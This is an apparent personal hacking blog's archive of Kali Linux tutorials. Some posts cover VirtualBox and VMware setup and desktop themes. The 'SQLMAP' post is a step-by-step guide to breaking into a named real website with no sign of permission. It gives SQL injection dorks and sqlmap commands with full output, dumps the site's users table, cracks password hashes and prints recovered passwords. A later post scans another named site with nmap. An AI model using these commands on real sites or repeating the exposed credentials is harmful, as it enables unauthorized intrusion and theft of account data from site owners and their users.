Tuesday, December 15, 2015

How to Install VMware tools - Kali linux


 Hello Guyz !

 I am Afghan Assassin .
I have made a tutorial about How can you install kali on virtualbox and its same in vmware, so many of you may installed that but may be you guyz asked yourself, Why its small screen? or why can't i copy or move files from computer to virtual machine ?

 So in this tutorial we are going to install vmware tools on kali linux so we will be able in order to use real version of kali

So lets start :

Start your Kali linux and now look at its menu, there you can find "vm" , click on that then new options will appear ,  just find "Install vmware tools" , now done

You will see "Install vmware tools" on your Desktop

Open it and there you can see vmware tools it is a tar.gz folder so just copy it and paste it in home

Now go to terminal and type ls

You will see your vmware folder name and its version and blah blah :D

So now we are going to install vmware tools

Open your terminal and start typing commands

tar -xvf VMwareTools<><>.tar.gz (enter)

its my example in order to install for yourself you need to type and enter your own vmware tools detail ...

Now type ls

Now you will see something new as the name of "vmware-tools-distrib"

Now type cd vmware-tools-distrib

Now type ls

Now type chmod +x vmware-install.pl

Now clear it by typing clear and enter

Don't close your terminal

Now type ./vmware-install.pl

Now default is pressing ENTER key so press it until its finish .....

 Contact me for more information

 My official Facebook Account :
https://www.facebook.com/AfghanAssassin.official.1

 or leave a comment to let me know :)

 Good bye ...
Posted by at No comments:

Wednesday, December 9, 2015

Installing Kali-Linux On your virtualbox

Hello guyz!
I am Afghan Assassin and due to request of some of my friends on how to install kali linux on virtualbox or use it in PC, today we are going to learn it

So as you all know i am using Kali as my OS because it is best OS for hacking and pen-testing but many of my friends requested that how can we install Kali in windows
Requirements :
A good PC with good RAM, Graphic, HDD
Internet connection

So in this case we gonna use virtualbox
You can download it from below link :
https://www.virtualbox.org/wiki/Downloads

And download Kali linux from official Kali Linux website :
www.kali.org/downloads

Lets begin our installation

After downloading virtualbox , open it and at left side you can see "New" option , click on it

Now you have to set your machine name, type, version
Now select the amount of base memory (RAM) to be allocated to the virtual machine

After that select the disk space

Recommended is 8.00GB
After that you will see new window opened just leave the default VDI.
leave the default option as the virtual disk storage details. Click on Next
to continue.

After that set file location and size.

Create to finish.
We just created virtual machine but now we need to install this machine, so for that lets begin our Kali-Linux Installation progress :)

Open Your virtualbox, there you can see Start , click on it now

starting Kali...

Choose "Graphical install"
Now choose language
Select your location

Choose your keyboard type in here we use American English

Now enter your host name
Enter your domain name or leave it !
Choose root password type your password for your OS

Choose time zone

Choose your partition scheme in this case we choose "Guided - use entire disk"

Select diskt to partion and continue

Now in partition scheme we use "All files in one partition"

Now after these all the next window will open, if you still don't want partition or installing or write changes to disk you can cancel it very easy!

But in this case we are going to install Kali so we click on yes and continue
Now it asks you for network mirror in this case we also choose yes and continue

Now skip this proxy setting by clicking on continue
you will be asked to install the GRUB boot loader to the master boot record.
Choose Yes and click on Continue.

Wait after installation complete, then system will reboot and DONE

Keep visiting for more tutorials

If anyone have any question about this post .. please leave a comment to let me know :)

Good bye...
Posted by at No comments:

Tuesday, December 8, 2015

[Setting themes on Kali Linux]

 
Hello Guys!

I am Afghan assassin and today i am going to teach downloading themes, installing themes in Kali-Linux , setting themes
So lets start from downloading theme for kali

Go to below link :
http://gnome-look.org/

As you can see :



Now at left side just choose one of them

    GTK 1.x
    GTK 2.x
    GTK 3.x


choose any theme you liked and download it !

So now its time to install themes

Go to in which directory it saved, for better learning simply copy and paste it on your Desktop

Now Open you terminal and type

cd Desktop

Now you are in desktop directory which means you can open any file or program located in Desktop :)

Now we install theme

type in terminal in Desktop directory or in which directory you saved

sudo tar -xvf yourfilenname.tar.gz

and ENTER

Now its installed and you can see its folders on your Desktop
Now lets move them to themes directory

Again open Desktop directory in terminal, now use command :

mv yourfoldername /usr/share/themes/

DONE

So Now we wanna change our theme

Go to application option > system tools > Preferences > Advanced settings

As you can see :

Now go to option GTK+THEME
there you will find your installed themes

Keep visiting for more tutorials!

Email me at : Hamedmh346@gmail.com

Good Bye...
Posted by at No comments:

Saturday, December 5, 2015

 SQLMAP
Hello Guys !
I am Afghan Assassin as you all know and today i am going to teach =How to hack website with sqlmap in 5 min=
---------------------------------------------------------------------------------------------
Sometimes it will take more time! ,  So we use dorks for finding vulnerable MYSQL websites, you can search for SQL dorks on google, as example i use a dork :

news.php id=

inurl:staff_id=

inurl:newsitem.php?num= andinurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

---------------------------------------------------------------------------------------------
So, you will get results like below image :



http://www.calidus.ro/en/news.php?id=2
To find out if this site is vulnerable to SQL injection, simply add an apostrophe at the end of the URL like this:
http://www.calidus.ro/en/news.php?id=2'

Now here you can see MYSQL ERROR :


Now for hacking it using sqlmap

Open your terminal:
Type :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 --dbs
---------------------------------------------------------------------------------------------
-u for your website URL and remove ' from end of URL, sqlmap for starting SQL attack, dbs for knowing about databases name

Then ENTER and you will see this :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 --dbs

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:50:59

[09:50:59] [INFO] resuming back-end DBMS 'mysql'
[09:50:59] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 7272=7272

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---
[09:51:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[09:51:00] [INFO] fetching database names
available databases [2]:
[*] caliduzb_calidussql
[*] information_schema

[09:51:00] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'

[*] shutting down at 09:51:00


Its different in other sites the difference is on database names and also if sqlmap asks you questions like [Y,n] , you just choose capital letter :
[Y,n] = Y

Now its time to attack on database for finding tables and columns then dump ...
Finding tables of database (dbs)
for that we use this command :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql --tables
---------------------------------------------------------------------------------------------
Your result should be... :

---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql --tables

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:55:01

[09:55:01] [INFO] resuming back-end DBMS 'mysql'
[09:55:02] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 7272=7272

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---
[09:55:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[09:55:03] [INFO] fetching tables for database: 'caliduzb_calidussql'
Database: caliduzb_calidussql
[50 tables]
+-------------------+
| about             |
| about_de          |
| about_en          |
| categories        |
| categories_de     |
| categories_en     |
| contact           |
| contact_de        |
| contact_en        |
| customers         |
| eco               |
| eco_de            |
| eco_en            |
| faq               |
| faq_de            |
| faq_en            |
| forum_answer      |
| forum_question    |
| galleries         |
| gallery           |
| gallery_de        |
| gallery_en        |
| gallery_images    |
| imp               |
| mission           |
| mission_de        |
| mission_en        |
| news              |
| news_de           |
| news_en           |
| pellets           |
| pellets_de        |
| pellets_en        |
| prices            |
| products          |
| products_de       |
| products_en       |
| projects          |
| projects_de       |
| projects_en       |
| special_offers    |
| special_offers_de |
| special_offers_en |
| support           |
| support_de        |
| support_en        |
| users             |
| vizion            |
| vizion_de         |
| vizion_en         |
+-------------------+

[09:55:03] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'

[*] shutting down at 09:55:03

---------------------------------------------------------------------------------------------
As you can see now we have information about tables so we have to know about users because we only need to hack it...
For that we use this command :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users --columns
---------------------------------------------------------------------------------------------
Sometimes its users and sometimes PRIVILEGES and may be any other things just search for it and use brain a little :D

Now we have got info about users also

Your result should be like :
---------------------------------------------------------------------------------------------
sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users --columns

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:01:47

[10:01:47] [INFO] resuming back-end DBMS 'mysql'
[10:01:47] [INFO] testing connection to the target URL
[10:01:48] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 7272=7272

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---
[10:01:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[10:01:48] [INFO] fetching columns for table 'users' in database 'caliduzb_calidussql'
Database: caliduzb_calidussql
Table: users
[11 columns]
+-----------------------+--------------+
| Column                | Type         |
+-----------------------+--------------+
| logcode               | varchar(100) |
| user_email            | varchar(100) |
| user_id               | mediumint(8) |
| user_last_confirm_key | varchar(40)  |
| user_lastvisit        | date         |
| user_new_privmsg      | tinyint(2)   |
| user_password         | varchar(40)  |
| user_regdate          | date         |
| user_type             | tinyint(2)   |
| username              | varchar(255) |
| username_clean        | varchar(255) |
+-----------------------+--------------+

[10:01:48] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'

[*] shutting down at 10:01:48

---------------------------------------------------------------------------------------------
Now lets dump it means we can hack it now
By using this command :

sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users -C user_id,user_password --dump

Your result should be :
---------------------------------------------------------------------------------------------
root@kali:~# sqlmap -u http://www.calidus.ro/en/news.php?id=2 -D caliduzb_calidussql -T users -C user_id,user_password --dump

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:05:55

[10:05:55] [INFO] resuming back-end DBMS 'mysql'
[10:05:55] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 7272=7272

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=2 AND (SELECT 8047 FROM(SELECT COUNT(*),CONCAT(0x7166787a71,(SELECT (CASE WHEN (8047=8047) THEN 1 ELSE 0 END)),0x71766c6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x7166787a71,0x6e6e464c735355596b66,0x71766c6371),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---
[10:05:57] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:05:57] [INFO] fetching columns 'user_id, user_password' for table 'users' in database 'caliduzb_calidussql'
[10:05:57] [INFO] fetching entries of column(s) 'user_id, user_password' for table 'users' in database 'caliduzb_calidussql'
[10:05:57] [INFO] analyzing table dump for possible password hashes
[10:05:57] [INFO] recognized possible password hashes in column 'user_password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[10:06:04] [INFO] using hash method 'md5_generic_passwd'
[10:06:04] [INFO] resuming password 'marjan' for hash '122f961db675f6a45b998594471a990b'
[10:06:04] [INFO] resuming password 'root' for hash '63a9f0ea7bb98050796b649e85481845'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>

---------------------------------------------------------------------------------------------
As you can see it asks for dictionary attack so default is pressing ENTER and waiting :D
Press ENTER
[10:07:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[10:07:48] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[10:07:48] [INFO] starting 4 processes
[10:08:03] [INFO] postprocessing table dump                                                                                                                                   
Database: caliduzb_calidussql
Table: users
[3 entries]
+---------+-------------------------------------------+
| user_id | user_password                             |
+---------+-------------------------------------------+
| 1       | a0dbde9503e13437db0f854b0b72a73b          |
| 8       | 63a9f0ea7bb98050796b649e85481845 (root)   |
| 6       | 122f961db675f6a45b998594471a990b (marjan) |
+---------+-------------------------------------------+

[10:08:03] [INFO] table 'caliduzb_calidussql.users' dumped to CSV file '/usr/share/sqlmap/output/www.calidus.ro/dump/caliduzb_calidussql/users.csv'
[10:08:03] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.calidus.ro'

[*] shutting down at 10:08:03
---------------------------------------------------------------------------------------------
DONE now we have got user and pass
two hash cracked but one more remaining

Now we are going to crack this hash free and online :)

Open your browser and search for :

https://hashkiller.co.uk/md5-decrypter.aspx

As you can see it :



Choose the hash that is not cracked yet, copy and paste it there like this:
(fill the captcha)


Now its done you have found user and pass

I hope you understand it correctly and if you have any problem you can contact me or leave a comment :) in next tutorials i will teach WAF & Finding admin panel

Keep visiting sharing and LIKE!


My gmail :
hamedmh346@gmail.com

Good bye...
Posted by at No comments:
MSF Basics
Hello Guys!
I am Afghan Assassin as you all know, today i teach you "
I must say that i am a Linux user and share my knowledge about linux not MS windows so please if you are reading and following my blog, delete your MS windows and install Kali-Linux.

1 : How to find IP address of a website
2 : How to find OS of website by its IP using Nmap
3 : Finding website ports
1)How to find any website IP address
Open your Kali-Linux terminal and type "nslookup" nslookup is our command and the next we type our site address, remove http/https and just type as example :
nslookup www.afghangovernment.com

As you can see in below image :


2) How to find OS of website by its IP using Nmap

First we must know what is Nmap and what it can do

Nmap
Nmap is one of such tools. It sends seven TCP/IP crafted packets (called tests) and waits for the answer.
Just know this it can help us :D

For using Nmap, we need to start Metasploit and for starting Metasploit we need to start Postgresql

For starting postresql open your terminal and type this command

service postresql start

And for starting MSF (Metasploit framework)

service metasploit start

Now we have to enter msfconsole, for that, type msfconsole on terminal and be patient :D

After it starts it looks like this image :



Now in the msf command line type :
db_nmap
Now you are in nmap

now we want to find information about this IP address 192.254.190.3, i found this using nslooup to www.afghangovernment.com (nslookup www.afghangovernment.com)
Its just example! :D

type : db_nmap (IP address)

Now we want to find how many ports this website have

For that Follow steps

After fetting info about IP address with db_nmap

Now type :
services -h
Then type :
services

Now you can see all open and filtered ports as example in below images :



This was just a part of exploiting website with Metasploit, i will teach more about it in future
Share, Comment, and like it if you want :)

My contact address :
My Gmail:
hamedmh346@gmail.com
My FB:
https://www.facebook.com/AfghanAssassin.official.1

Keep visiting for tutorials

Enjoy!

Good bye.


Posted by at No comments:
Subscribe to: Posts (Atom)